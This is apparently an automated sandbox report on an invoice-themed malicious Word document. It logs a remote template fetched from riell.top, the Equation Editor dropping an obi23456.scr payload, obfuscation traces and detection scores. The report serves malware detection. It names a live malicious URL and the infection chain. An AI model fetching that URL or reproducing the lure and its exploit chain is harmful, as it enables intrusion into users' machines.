Classification label: mal100.troj.spyw.expl.evad.winDOCX@6/19@38/6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx

Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6F93.tmp

Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx

OLE indicator, Word Document stream: true

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx	ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Section loaded: gpapi.dll	Jump to behavior

Source: OVER DUE INVOICE PAYMENT.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\OVER DUE INVOICE PAYMENT.docx

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: OVER DUE INVOICE PAYMENT.docx

Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: OVER DUE INVOICE PAYMENT.docx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains potential unpacker

Source: obb[1].scr.8.dr, ----.cs	.Net Code: CreateProvider
Source: obi23456.scr.8.dr, ----.cs	.Net Code: CreateProvider

Binary contains a suspicious time stamp

Source: obb[1].scr.8.dr

Static PE information: 0x922C3AB8 [Tue Sep 17 22:29:12 2047 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00568F60 push eax; retf	8_2_00568F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00570F60 push eax; retn 0056h	8_2_00570F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00574115 push ebp; ret	8_2_00574117
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0057410D push ebp; ret	8_2_0057410F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005758DF push ecx; ret	8_2_005758E3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005758D8 push ecx; ret	8_2_005758DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005601F4 push eax; retf	8_2_005601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_00575880 push ecx; ret	8_2_00575883
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_0056418D push eax; iretd	8_2_0056468E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_005740AD push ecx; ret	8_2_005740AF

Source: obb[1].scr.8.dr	Static PE information: section name: .text entropy: 7.37475269907409
Source: obi23456.scr.8.dr	Static PE information: section name: .text entropy: 7.37475269907409

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRoot			Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://riell.top/obb.doc

Drops PE files with a suspicious file extension

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: obb[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 91894CAD.doc.0.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
